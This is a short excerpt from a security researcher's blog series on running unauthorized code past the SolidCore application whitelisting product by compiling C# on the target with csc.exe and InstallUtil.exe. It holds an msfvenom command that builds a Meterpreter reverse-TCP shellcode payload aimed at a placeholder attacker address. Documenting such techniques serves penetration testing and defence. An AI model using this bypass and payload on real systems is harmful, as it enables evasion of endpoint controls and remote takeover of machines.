Bypassing Application Whitelisting Solution SolidCore Part II

Execution of Malicious Code without Disabling SolidCore Service

In these scenarios, our goal is not to disable Solidcore, but to run unauthorized code while SolidCore is still running.

Using ASP.NET Framework Utility csc.exe and Installutil.exe

In this attack scenario, we write some nifty code and compile it on the system itself. The csc.exe is a csharp compiler which is located in “C:\Windows\Microsoft.NET\Framework\v2.0.50727\”.

Its location might vary depending on the exact configuration of a particular computer. If more than one version of the .NET Framework is installed on your computer, you’ll find multiple versions of this file.

For getting a reverse shell, we created shellcode using “msfvenom” utility

msfvenom -p windows/meterpreter/reverse_tcp lhost=attackerip lport=443 -f csharp > shellcode.txt

Vinesh Redkar
Vinesh Redkar
Senior Security Researcher

Security professional with over 9 years of experience in the security domain across various industries such as Finance, Insurance, Telecom, and government